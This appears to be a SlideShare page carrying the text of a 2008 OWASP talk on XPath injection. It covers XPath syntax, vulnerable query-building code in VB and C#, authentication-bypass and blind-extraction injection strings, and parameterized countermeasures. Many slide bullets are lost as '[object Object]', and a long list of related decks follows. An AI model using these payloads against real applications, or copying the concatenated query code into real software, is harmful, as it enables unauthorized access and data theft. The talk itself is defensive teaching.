SlideShare a Scribd company logo

XPath Injection

Roberto Suggi Liverani
Roberto Suggi LiveraniPentester/Reseacher
OWASP – XPath Injection overview Roberto Suggi Liverani Security Consultant Security-Assessment.com 21 February 2008
Who am I? ,[object Object],[object Object],[object Object],[object Object],[object Object]
Agenda ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
What is XPath? ,[object Object],[object Object],[object Object],[object Object],[object Object]
An XML document from XPath perspective (1/2) ,[object Object]
An XML document from Xpath perspective (2/2) ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
XPath Syntax (1/3) ,[object Object],[object Object],[object Object],Expression Description nodename Selects all child nodes of the named node / Selects from the root node // Selects nodes in the document from the current node that match the selection no matter where they are . Selects the current node .. Selects the parent of the current node
XPath Syntax (2/3) ,[object Object]
XPath Syntax – other query examples (3/3) Expression Result users Selects all the child nodes of the users element /users Selects the root element users users/user Selects all user elements that are children of users //users Selects all users elements no matter where they are in the document users//user Selects all user elements that are descendant of the users element, no matter where they are under the users element
XPath Predicates ,[object Object],[object Object],XPath operators are shown in red . Expression Result /users/user[1] Selects the first user element that is the child of the users element. /users/user[last()] Selects the last user element that is the child of the users element /users/user[position() < 3] Selects the first two user elements that are children of the users element //username[@id = '1'] Selects all the username elements that have an attribute named id with a value of ‘1'
XPath Location Path (1/2) ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
XPath Location Path – Examples (2/2) XPath Wilcards are bolded in red . XPath Axisname are underlined. Example Result child ::user Selects all user nodes that are children of the current node attribute ::id Selects the id attribute of the current node child :: * Selects all children of the current node attribute :: * Selects all attributes of the current node child :: text() Selects all text child nodes of the current node child :: node() Selects all child nodes of the current node descendant ::users Selects all users descendants of the current node
XPath Functions ,[object Object],[object Object],[object Object],Function Name Description substring( string,start,len ) Returns the substring from the start position to the specified length. Index of the first character is 1. If length is omitted it returns the substring from the start position to the end string-length( string ) Returns the length of the specified string. count( (item,item,...) ) Returns the count of nodes starts-with( string1,string2 ) Returns true if string1 starts with string2, otherwise it returns false contains( string1,string2 ) Returns true if string1 contains string2, otherwise it returns false number( arg ) Returns the numeric value of the argument. The argument could be a boolean, string, or node-set string( arg ) Returns the string value of the argument. The argument could be a number, boolean, or node-set
XPath Injection (1/2) ,[object Object],[object Object],VB : Dim FindUserXPath as String FindUserXPath = &quot;//Users/user[username/text()='&quot; & Request(&quot;Username&quot;) & &quot;' And password/text()='&quot; & Request(&quot;Password&quot;) & &quot;']&quot; C# : String FindUserXPath; FindUserXPath = &quot;//Users/user[username/text()='&quot; + Request(&quot;Username&quot;) + &quot;' And password/text()='&quot; + Request(&quot;Password&quot;) + &quot;']&quot;; Username = user Password = password XPath query becomes: //users/user[username/text()=‘ user ’ and password/text()=‘ password ’]
XPath Injection (2/2) ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Username = user’ or ‘1’ = ‘1 Password = password XPath query becomes: //users/user[username/text()=‘ user’ or ‘1’ = ‘1 ’ and password/text()=‘ password ’]
Blind XPath Injection (1/3) ,[object Object],[object Object],[object Object],[object Object],Username = user Password = password XPath query becomes: //users/user[username/text()=‘ user ’ and password/text()=‘ password ’] Username = jjj' or name(//users/user/username[1]) = 'username' or 'a'='b Password = password XPath query becomes: //users/user[username/text()=‘ jjj' or name(//users/user/username[1]) = 'username' or 'a'='b' and password/text()=‘ password ’]
Blind XPath Injection (2/3) ,[object Object],[object Object],count(//user/child::node()) Username = root' and substring((//user[position()=2]/child::node()[position()=1]),1,1)=&quot;a&quot; and '1' = '1 Password = OAhhgg XPath query becomes: //users/user[username/text()= ‘root’ and substring((//user[position()=2]/child::node()[position()=1]),1,1)=&quot;a&quot; and '1' = '1' and password/text()=‘ OAhhgg ’]
Blind XPath Injection – (3/3) ,[object Object],[object Object],[object Object],[object Object],string-length(//username[position()=1]/child::node()[position()=1])=4 count(//user/child::node()) contains(//username[position()=1]/child::node()[position()=1],”r”)
XPath Injection Countermeasures ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],XPathNodeIterator custData = XPathCache.Select( &quot;//customer[@name=$name and @password=$password]&quot;, customersDocument, new XPathVariable(&quot;name&quot;, txtName.Text), new XPathVariable(&quot;password&quot;, txtPassword.Text));
Questions/Conclusion ,[object Object],[object Object],[object Object],[object Object]
References – Misc. ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
References ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
References ,[object Object],[object Object]
1 of 23

XPath Injection

Download to read offline
Technology

Talk covering the basics of XPath and injection attacks against application using XPath as a query language.

Roberto Suggi Liverani
Roberto Suggi LiveraniPentester/Reseacher

Recommended

2 years with python and serverless by
2 years with python and serverless2 years with python and serverless
2 years with python and serverlessHector Canto
185 views71 slides
CUST-10 Customizing the Upload File(s) dialog in Alfresco Share by
CUST-10 Customizing the Upload File(s) dialog in Alfresco ShareCUST-10 Customizing the Upload File(s) dialog in Alfresco Share
CUST-10 Customizing the Upload File(s) dialog in Alfresco ShareAlfresco Software
6.1K views36 slides
iOS Application Penetration Testing for Beginners by
iOS Application Penetration Testing for BeginnersiOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for BeginnersRyanISI
8.5K views97 slides
Linux Performance Analysis: New Tools and Old Secrets by
Linux Performance Analysis: New Tools and Old SecretsLinux Performance Analysis: New Tools and Old Secrets
Linux Performance Analysis: New Tools and Old SecretsBrendan Gregg
604K views75 slides
Pwning the Enterprise With PowerShell by
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShellBeau Bullock
6.4K views42 slides
A Case Study in Attacking KeePass by
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePassWill Schroeder
10K views50 slides
[네이버오픈소스세미나] Next Generation Spring Security OAuth2.0 - 이명현 by
[네이버오픈소스세미나] Next Generation Spring Security OAuth2.0 - 이명현[네이버오픈소스세미나] Next Generation Spring Security OAuth2.0 - 이명현
[네이버오픈소스세미나] Next Generation Spring Security OAuth2.0 - 이명현NAVER Engineering
21.2K views49 slides
OWASP AppSecCali 2015 - Marshalling Pickles by
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
132.8K views84 slides

More Related Content

What's hot

[2D1]Elasticsearch 성능 최적화 by
[2D1]Elasticsearch 성능 최적화[2D1]Elasticsearch 성능 최적화
[2D1]Elasticsearch 성능 최적화NAVER D2
30.5K views51 slides
Py.test by
Py.testPy.test
Py.testsoasme
6.8K views51 slides
Offensive PowerShell Cheat Sheet by
Offensive PowerShell Cheat SheetOffensive PowerShell Cheat Sheet
Offensive PowerShell Cheat SheetRahmat Nurfauzi
2.2K views5 slides
Ekoparty 2017 - The Bug Hunter's Methodology by
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
7.9K views58 slides
DevSecOps: Let's Write Security Unit Tests by
DevSecOps: Let's Write Security Unit TestsDevSecOps: Let's Write Security Unit Tests
DevSecOps: Let's Write Security Unit TestsPuma Security, LLC
910 views31 slides
BPF Internals (eBPF) by
BPF Internals (eBPF)BPF Internals (eBPF)
BPF Internals (eBPF)Brendan Gregg
15.3K views122 slides
Linux kernel tracing by
Linux kernel tracingLinux kernel tracing
Linux kernel tracingViller Hsiao
16.9K views70 slides
Effective testing with pytest by
Effective testing with pytestEffective testing with pytest
Effective testing with pytestHector Canto
632 views57 slides
SonarQube와 함께하는 소프트웨어 품질 세미나 - SonarQube 소개 by
SonarQube와 함께하는 소프트웨어 품질 세미나 - SonarQube 소개SonarQube와 함께하는 소프트웨어 품질 세미나 - SonarQube 소개
SonarQube와 함께하는 소프트웨어 품질 세미나 - SonarQube 소개CURVC Corp
3.4K views36 slides
Itb 2021 - Bulding Quick APIs by Gavin Pickin by
Itb 2021 - Bulding Quick APIs by Gavin PickinItb 2021 - Bulding Quick APIs by Gavin Pickin
Itb 2021 - Bulding Quick APIs by Gavin PickinGavin Pickin
179 views88 slides
CQRS and Event Sourcing in a Symfony application by
CQRS and Event Sourcing in a Symfony applicationCQRS and Event Sourcing in a Symfony application
CQRS and Event Sourcing in a Symfony applicationSamuel ROZE
12.7K views59 slides
ZeroNights 2018 | I <"3 XSS by
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSДмитрий Бумов
527 views68 slides
F5 BIG-IP Misconfigurations by
F5 BIG-IP MisconfigurationsF5 BIG-IP Misconfigurations
F5 BIG-IP MisconfigurationsDenis Kolegov
3.2K views26 slides
Java 8-streams-collectors-patterns by
Java 8-streams-collectors-patternsJava 8-streams-collectors-patterns
Java 8-streams-collectors-patternsJosé Paumard
31.1K views451 slides
JSON Injection by
JSON InjectionJSON Injection
JSON Injectionn|u - The Open Security Community
38K views8 slides
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015 by
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
6.5K views84 slides
The Rust Programming Language: an Overview by
The Rust Programming Language: an OverviewThe Rust Programming Language: an Overview
The Rust Programming Language: an OverviewRoberto Casadei
965 views61 slides
AFLGo: Directed Greybox Fuzzing by
AFLGo: Directed Greybox FuzzingAFLGo: Directed Greybox Fuzzing
AFLGo: Directed Greybox Fuzzingmboehme
1.6K views57 slides
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour by
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
52.9K views60 slides
Log analysis using Logstash,ElasticSearch and Kibana by
Log analysis using Logstash,ElasticSearch and KibanaLog analysis using Logstash,ElasticSearch and Kibana
Log analysis using Logstash,ElasticSearch and KibanaAvinash Ramineni
21.3K views20 slides

What's hot (20)

[2D1]Elasticsearch 성능 최적화 by NAVER D2
[2D1]Elasticsearch 성능 최적화[2D1]Elasticsearch 성능 최적화
[2D1]Elasticsearch 성능 최적화
NAVER D230.5K views
Py.test by soasme
Py.testPy.test
Py.test
soasme6.8K views
Offensive PowerShell Cheat Sheet by Rahmat Nurfauzi
Offensive PowerShell Cheat SheetOffensive PowerShell Cheat Sheet
Offensive PowerShell Cheat Sheet
Rahmat Nurfauzi2.2K views
Ekoparty 2017 - The Bug Hunter's Methodology by bugcrowd
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
bugcrowd7.9K views
DevSecOps: Let's Write Security Unit Tests by Puma Security, LLC
DevSecOps: Let's Write Security Unit TestsDevSecOps: Let's Write Security Unit Tests
DevSecOps: Let's Write Security Unit Tests
Puma Security, LLC910 views
BPF Internals (eBPF) by Brendan Gregg
BPF Internals (eBPF)BPF Internals (eBPF)
BPF Internals (eBPF)
Brendan Gregg15.3K views
Linux kernel tracing by Viller Hsiao
Linux kernel tracingLinux kernel tracing
Linux kernel tracing
Viller Hsiao16.9K views
Effective testing with pytest by Hector Canto
Effective testing with pytestEffective testing with pytest
Effective testing with pytest
Hector Canto632 views
SonarQube와 함께하는 소프트웨어 품질 세미나 - SonarQube 소개 by CURVC Corp
SonarQube와 함께하는 소프트웨어 품질 세미나 - SonarQube 소개SonarQube와 함께하는 소프트웨어 품질 세미나 - SonarQube 소개
SonarQube와 함께하는 소프트웨어 품질 세미나 - SonarQube 소개
CURVC Corp3.4K views
Itb 2021 - Bulding Quick APIs by Gavin Pickin by Gavin Pickin
Itb 2021 - Bulding Quick APIs by Gavin PickinItb 2021 - Bulding Quick APIs by Gavin Pickin
Itb 2021 - Bulding Quick APIs by Gavin Pickin
Gavin Pickin179 views
CQRS and Event Sourcing in a Symfony application by Samuel ROZE
CQRS and Event Sourcing in a Symfony applicationCQRS and Event Sourcing in a Symfony application
CQRS and Event Sourcing in a Symfony application
Samuel ROZE12.7K views
ZeroNights 2018 | I <"3 XSS by Дмитрий Бумов
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSS
Дмитрий Бумов527 views
F5 BIG-IP Misconfigurations by Denis Kolegov
F5 BIG-IP MisconfigurationsF5 BIG-IP Misconfigurations
F5 BIG-IP Misconfigurations
Denis Kolegov3.2K views
Java 8-streams-collectors-patterns by José Paumard
Java 8-streams-collectors-patternsJava 8-streams-collectors-patterns
Java 8-streams-collectors-patterns
José Paumard31.1K views
JSON Injection by n|u - The Open Security Community
JSON InjectionJSON Injection
JSON Injection
n|u - The Open Security Community38K views
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015 by CODE BLUE
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
CODE BLUE6.5K views
The Rust Programming Language: an Overview by Roberto Casadei
The Rust Programming Language: an OverviewThe Rust Programming Language: an Overview
The Rust Programming Language: an Overview
Roberto Casadei965 views
AFLGo: Directed Greybox Fuzzing by mboehme
AFLGo: Directed Greybox FuzzingAFLGo: Directed Greybox Fuzzing
AFLGo: Directed Greybox Fuzzing
mboehme1.6K views
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour by Soroush Dalili
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
Soroush Dalili52.9K views
Log analysis using Logstash,ElasticSearch and Kibana by Avinash Ramineni
Log analysis using Logstash,ElasticSearch and KibanaLog analysis using Logstash,ElasticSearch and Kibana
Log analysis using Logstash,ElasticSearch and Kibana
Avinash Ramineni21.3K views

Similar to XPath Injection

Hacking XPATH 2.0 by
Hacking XPATH 2.0Hacking XPATH 2.0
Hacking XPATH 2.0michelemanzotti
2.1K views65 slides
XML & XPath Injections by
XML & XPath InjectionsXML & XPath Injections
XML & XPath InjectionsAMol NAik
4.9K views37 slides
Xml session by
Xml sessionXml session
Xml sessionFarag Zakaria
866 views47 slides
XPath - XML Path Language by
XPath - XML Path LanguageXPath - XML Path Language
XPath - XML Path Languageyht4ever
5.4K views27 slides
ITU - MDD - XText by
ITU - MDD - XTextITU - MDD - XText
ITU - MDD - XTextTonny Madsen
892 views26 slides
Selenium-Locators by
Selenium-LocatorsSelenium-Locators
Selenium-LocatorsMithilesh Singh
191 views25 slides
Xpath.pdf by
Xpath.pdfXpath.pdf
Xpath.pdfBalasundaramSr
1 view26 slides
Developing web apps using Erlang-Web by
Developing web apps using Erlang-WebDeveloping web apps using Erlang-Web
Developing web apps using Erlang-Webfanqstefan
4.6K views33 slides
Sax Dom Tutorial by
Sax Dom TutorialSax Dom Tutorial
Sax Dom Tutorialvikram singh
1.6K views24 slides
XPath XSLT Workshop - Concept Listing by
XPath XSLT Workshop - Concept ListingXPath XSLT Workshop - Concept Listing
XPath XSLT Workshop - Concept ListingIndrajeet Verma
254 views3 slides
Slice for Distributed Persistence (JavaOne 2010) by
Slice for Distributed Persistence (JavaOne 2010)Slice for Distributed Persistence (JavaOne 2010)
Slice for Distributed Persistence (JavaOne 2010)Pinaki Poddar
981 views62 slides
Considering Structural and Vocabulary Heterogeneity in XML Query: FPTPQ and H... by
Considering Structural and Vocabulary Heterogeneity in XML Query: FPTPQ and H...Considering Structural and Vocabulary Heterogeneity in XML Query: FPTPQ and H...
Considering Structural and Vocabulary Heterogeneity in XML Query: FPTPQ and H...ijdms
38 views21 slides
CONSIDERING STRUCTURAL AND VOCABULARY HETEROGENEITY IN XML QUERY: FPTPQ AND H... by
CONSIDERING STRUCTURAL AND VOCABULARY HETEROGENEITY IN XML QUERY: FPTPQ AND H...CONSIDERING STRUCTURAL AND VOCABULARY HETEROGENEITY IN XML QUERY: FPTPQ AND H...
CONSIDERING STRUCTURAL AND VOCABULARY HETEROGENEITY IN XML QUERY: FPTPQ AND H...ijdms
8 views21 slides
Introduction to XML by
Introduction to XMLIntroduction to XML
Introduction to XMLBG Java EE Course
3.5K views56 slides
C1320prespost by
C1320prespostC1320prespost
C1320prespostFALLEE31188
365 views30 slides
Xml presentation by
Xml presentationXml presentation
Xml presentationMiguel Angel Teheran Garcia
5.6K views25 slides
Multi Document Text Summarization using Backpropagation Network by
Multi Document Text Summarization using Backpropagation NetworkMulti Document Text Summarization using Backpropagation Network
Multi Document Text Summarization using Backpropagation NetworkIRJET Journal
118 views5 slides
Inroduction to XSLT with PHP4 by
Inroduction to XSLT with PHP4Inroduction to XSLT with PHP4
Inroduction to XSLT with PHP4Stephan Schmidt
959 views49 slides
Struts2 by
Struts2Struts2
Struts2Scott Stanlick
3.8K views69 slides
Stax parser by
Stax parserStax parser
Stax parserShanmukhaChariK
30 views7 slides

Similar to XPath Injection (20)

Hacking XPATH 2.0 by michelemanzotti
Hacking XPATH 2.0Hacking XPATH 2.0
Hacking XPATH 2.0
michelemanzotti2.1K views
XML & XPath Injections by AMol NAik
XML & XPath InjectionsXML & XPath Injections
XML & XPath Injections
AMol NAik4.9K views
Xml session by Farag Zakaria
Xml sessionXml session
Xml session
Farag Zakaria866 views
XPath - XML Path Language by yht4ever
XPath - XML Path LanguageXPath - XML Path Language
XPath - XML Path Language
yht4ever5.4K views
ITU - MDD - XText by Tonny Madsen
ITU - MDD - XTextITU - MDD - XText
ITU - MDD - XText
Tonny Madsen892 views
Selenium-Locators by Mithilesh Singh
Selenium-LocatorsSelenium-Locators
Selenium-Locators
Mithilesh Singh191 views
Xpath.pdf by BalasundaramSr
Xpath.pdfXpath.pdf
Xpath.pdf
BalasundaramSr1 view
Developing web apps using Erlang-Web by fanqstefan
Developing web apps using Erlang-WebDeveloping web apps using Erlang-Web
Developing web apps using Erlang-Web
fanqstefan4.6K views
Sax Dom Tutorial by vikram singh
Sax Dom TutorialSax Dom Tutorial
Sax Dom Tutorial
vikram singh1.6K views
XPath XSLT Workshop - Concept Listing by Indrajeet Verma
XPath XSLT Workshop - Concept ListingXPath XSLT Workshop - Concept Listing
XPath XSLT Workshop - Concept Listing
Indrajeet Verma254 views
Slice for Distributed Persistence (JavaOne 2010) by Pinaki Poddar
Slice for Distributed Persistence (JavaOne 2010)Slice for Distributed Persistence (JavaOne 2010)
Slice for Distributed Persistence (JavaOne 2010)
Pinaki Poddar981 views
Considering Structural and Vocabulary Heterogeneity in XML Query: FPTPQ and H... by ijdms
Considering Structural and Vocabulary Heterogeneity in XML Query: FPTPQ and H...Considering Structural and Vocabulary Heterogeneity in XML Query: FPTPQ and H...
Considering Structural and Vocabulary Heterogeneity in XML Query: FPTPQ and H...
ijdms38 views
CONSIDERING STRUCTURAL AND VOCABULARY HETEROGENEITY IN XML QUERY: FPTPQ AND H... by ijdms
CONSIDERING STRUCTURAL AND VOCABULARY HETEROGENEITY IN XML QUERY: FPTPQ AND H...CONSIDERING STRUCTURAL AND VOCABULARY HETEROGENEITY IN XML QUERY: FPTPQ AND H...
CONSIDERING STRUCTURAL AND VOCABULARY HETEROGENEITY IN XML QUERY: FPTPQ AND H...
ijdms8 views
Introduction to XML by BG Java EE Course
Introduction to XMLIntroduction to XML
Introduction to XML
BG Java EE Course 3.5K views
C1320prespost by FALLEE31188
C1320prespostC1320prespost
C1320prespost
FALLEE31188365 views
Xml presentation by Miguel Angel Teheran Garcia
Xml presentationXml presentation
Xml presentation
Miguel Angel Teheran Garcia5.6K views
Multi Document Text Summarization using Backpropagation Network by IRJET Journal
Multi Document Text Summarization using Backpropagation NetworkMulti Document Text Summarization using Backpropagation Network
Multi Document Text Summarization using Backpropagation Network
IRJET Journal118 views
Inroduction to XSLT with PHP4 by Stephan Schmidt
Inroduction to XSLT with PHP4Inroduction to XSLT with PHP4
Inroduction to XSLT with PHP4
Stephan Schmidt959 views
Struts2 by Scott Stanlick
Struts2Struts2
Struts2
Scott Stanlick3.8K views
Stax parser by ShanmukhaChariK
Stax parserStax parser
Stax parser
ShanmukhaChariK30 views

More from Roberto Suggi Liverani

I got 99 trends and a # is all of them by
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of themRoberto Suggi Liverani
5.8K views122 slides
Augmented reality in your web proxy by
Augmented reality in your web proxyAugmented reality in your web proxy
Augmented reality in your web proxyRoberto Suggi Liverani
3.3K views39 slides
Cross Context Scripting attacks & exploitation by
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationRoberto Suggi Liverani
3.5K views69 slides
Window Shopping Browser - Bug Hunting in 2012 by
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Roberto Suggi Liverani
3.1K views56 slides
None More Black - the Dark Side of SEO by
None More Black - the Dark Side of SEONone More Black - the Dark Side of SEO
None More Black - the Dark Side of SEORoberto Suggi Liverani
21K views58 slides
Bridging the gap - Security and Software Testing by
Bridging the gap - Security and Software TestingBridging the gap - Security and Software Testing
Bridging the gap - Security and Software TestingRoberto Suggi Liverani
1.2K views31 slides
Defending Against Application DoS attacks by
Defending Against Application DoS attacksDefending Against Application DoS attacks
Defending Against Application DoS attacksRoberto Suggi Liverani
5.1K views51 slides
Exploiting Firefox Extensions by
Exploiting Firefox ExtensionsExploiting Firefox Extensions
Exploiting Firefox ExtensionsRoberto Suggi Liverani
3.5K views42 slides
Black Energy18 - Russian botnet package analysis by
Black Energy18 - Russian botnet package analysisBlack Energy18 - Russian botnet package analysis
Black Energy18 - Russian botnet package analysisRoberto Suggi Liverani
1.8K views48 slides
Web Spam Techniques by
Web Spam TechniquesWeb Spam Techniques
Web Spam TechniquesRoberto Suggi Liverani
78.8K views53 slides
Reversing JavaScript by
Reversing JavaScriptReversing JavaScript
Reversing JavaScriptRoberto Suggi Liverani
2.9K views48 slides
Ajax Security by
Ajax SecurityAjax Security
Ajax SecurityRoberto Suggi Liverani
2K views33 slides
Browser Security by
Browser SecurityBrowser Security
Browser SecurityRoberto Suggi Liverani
16.4K views28 slides

More from Roberto Suggi Liverani (13)

I got 99 trends and a # is all of them by Roberto Suggi Liverani
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
Roberto Suggi Liverani5.8K views
Augmented reality in your web proxy by Roberto Suggi Liverani
Augmented reality in your web proxyAugmented reality in your web proxy
Augmented reality in your web proxy
Roberto Suggi Liverani3.3K views
Cross Context Scripting attacks & exploitation by Roberto Suggi Liverani
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitation
Roberto Suggi Liverani3.5K views
Window Shopping Browser - Bug Hunting in 2012 by Roberto Suggi Liverani
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012
Roberto Suggi Liverani3.1K views
None More Black - the Dark Side of SEO by Roberto Suggi Liverani
None More Black - the Dark Side of SEONone More Black - the Dark Side of SEO
None More Black - the Dark Side of SEO
Roberto Suggi Liverani21K views
Bridging the gap - Security and Software Testing by Roberto Suggi Liverani
Bridging the gap - Security and Software TestingBridging the gap - Security and Software Testing
Bridging the gap - Security and Software Testing
Roberto Suggi Liverani1.2K views
Defending Against Application DoS attacks by Roberto Suggi Liverani
Defending Against Application DoS attacksDefending Against Application DoS attacks
Defending Against Application DoS attacks
Roberto Suggi Liverani5.1K views
Exploiting Firefox Extensions by Roberto Suggi Liverani
Exploiting Firefox ExtensionsExploiting Firefox Extensions
Exploiting Firefox Extensions
Roberto Suggi Liverani3.5K views
Black Energy18 - Russian botnet package analysis by Roberto Suggi Liverani
Black Energy18 - Russian botnet package analysisBlack Energy18 - Russian botnet package analysis
Black Energy18 - Russian botnet package analysis
Roberto Suggi Liverani1.8K views
Web Spam Techniques by Roberto Suggi Liverani
Web Spam TechniquesWeb Spam Techniques
Web Spam Techniques
Roberto Suggi Liverani78.8K views
Reversing JavaScript by Roberto Suggi Liverani
Reversing JavaScriptReversing JavaScript
Reversing JavaScript
Roberto Suggi Liverani2.9K views
Ajax Security by Roberto Suggi Liverani
Ajax SecurityAjax Security
Ajax Security
Roberto Suggi Liverani2K views
Browser Security by Roberto Suggi Liverani
Browser SecurityBrowser Security
Browser Security
Roberto Suggi Liverani16.4K views

Recently uploaded

Adopting Karpenter for Cost and Simplicity at Grafana Labs.pdf by
Adopting Karpenter for Cost and Simplicity at Grafana Labs.pdfAdopting Karpenter for Cost and Simplicity at Grafana Labs.pdf
Adopting Karpenter for Cost and Simplicity at Grafana Labs.pdfMichaelOLeary82
16 views74 slides
User Centred Design and Implementation of Useful Picture Archiving and Commun... by
User Centred Design and Implementation of Useful Picture Archiving and Commun...User Centred Design and Implementation of Useful Picture Archiving and Commun...
User Centred Design and Implementation of Useful Picture Archiving and Commun...Lighton Phiri
24 views26 slides
This talk was not generated with ChatGPT: how AI is changing science by
This talk was not generated with ChatGPT: how AI is changing scienceThis talk was not generated with ChatGPT: how AI is changing science
This talk was not generated with ChatGPT: how AI is changing scienceElena Simperl
44 views13 slides
Modern Database Best Practices by
Modern Database Best PracticesModern Database Best Practices
Modern Database Best PracticesAll Things Open
40 views55 slides
Business Analyst Series 2023 - Week 4 Session 8 by
Business Analyst Series 2023 - Week 4 Session 8Business Analyst Series 2023 - Week 4 Session 8
Business Analyst Series 2023 - Week 4 Session 8DianaGray10
238 views13 slides
Redefining the book supply chain: A glimpse into the future - Tech Forum 2023 by
Redefining the book supply chain: A glimpse into the future - Tech Forum 2023Redefining the book supply chain: A glimpse into the future - Tech Forum 2023
Redefining the book supply chain: A glimpse into the future - Tech Forum 2023BookNet Canada
57 views19 slides
Cocktail of Environments. How to Mix Test and Development Environments and St... by
Cocktail of Environments. How to Mix Test and Development Environments and St...Cocktail of Environments. How to Mix Test and Development Environments and St...
Cocktail of Environments. How to Mix Test and Development Environments and St...Aleksandr Tarasov
27 views135 slides
[2024] GDSC India - Discover, Design, Develop.pdf.pdf by
[2024] GDSC India - Discover, Design, Develop.pdf.pdf[2024] GDSC India - Discover, Design, Develop.pdf.pdf
[2024] GDSC India - Discover, Design, Develop.pdf.pdfbcedsc
28 views19 slides
Optimizing Communication to Optimize Human Behavior - LCBM by
Optimizing Communication to Optimize Human Behavior - LCBMOptimizing Communication to Optimize Human Behavior - LCBM
Optimizing Communication to Optimize Human Behavior - LCBMYaman Kumar
46 views49 slides
Cencora Executive Symposium by
Cencora Executive SymposiumCencora Executive Symposium
Cencora Executive Symposiummarketingcommunicati21
216 views14 slides
Initiating and Advancing Your Strategic GIS Governance Strategy by
Initiating and Advancing Your Strategic GIS Governance StrategyInitiating and Advancing Your Strategic GIS Governance Strategy
Initiating and Advancing Your Strategic GIS Governance StrategySafe Software
280 views68 slides
Digital Personal Data Protection (DPDP) Practical Approach For CISOs by
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
187 views59 slides
Mobile Core Solutions & Successful Cases.pdf by
Mobile Core Solutions & Successful Cases.pdfMobile Core Solutions & Successful Cases.pdf
Mobile Core Solutions & Successful Cases.pdfIPLOOK Networks
20 views7 slides
Measurecamp Brussels - Synthetic data.pdf by
Measurecamp Brussels - Synthetic data.pdfMeasurecamp Brussels - Synthetic data.pdf
Measurecamp Brussels - Synthetic data.pdfHuman37
34 views14 slides
What is Authentication Active Directory_.pptx by
What is Authentication Active Directory_.pptxWhat is Authentication Active Directory_.pptx
What is Authentication Active Directory_.pptxHeenaMehta35
31 views7 slides
Transcript: Show and tell: What’s in your tech stack? - Tech Forum 2023 by
Transcript: Show and tell: What’s in your tech stack? - Tech Forum 2023Transcript: Show and tell: What’s in your tech stack? - Tech Forum 2023
Transcript: Show and tell: What’s in your tech stack? - Tech Forum 2023BookNet Canada
41 views16 slides
Elevating Event-Driven World: A Deep Dive into AsyncAPI v3 by
Elevating Event-Driven World: A Deep Dive into AsyncAPI v3Elevating Event-Driven World: A Deep Dive into AsyncAPI v3
Elevating Event-Driven World: A Deep Dive into AsyncAPI v3Postman
19 views32 slides
Qualifying SaaS, IaaS.pptx by
Qualifying SaaS, IaaS.pptxQualifying SaaS, IaaS.pptx
Qualifying SaaS, IaaS.pptxSachin Bhandari
1.2K views8 slides
KubeConNA23 Recap.pdf by
KubeConNA23 Recap.pdfKubeConNA23 Recap.pdf
KubeConNA23 Recap.pdfMichaelOLeary82
34 views27 slides
Show and tell: What’s in your tech stack? - Tech Forum 2023 by
Show and tell: What’s in your tech stack? - Tech Forum 2023Show and tell: What’s in your tech stack? - Tech Forum 2023
Show and tell: What’s in your tech stack? - Tech Forum 2023BookNet Canada
40 views78 slides

Recently uploaded (20)

Adopting Karpenter for Cost and Simplicity at Grafana Labs.pdf by MichaelOLeary82
Adopting Karpenter for Cost and Simplicity at Grafana Labs.pdfAdopting Karpenter for Cost and Simplicity at Grafana Labs.pdf
Adopting Karpenter for Cost and Simplicity at Grafana Labs.pdf
MichaelOLeary8216 views
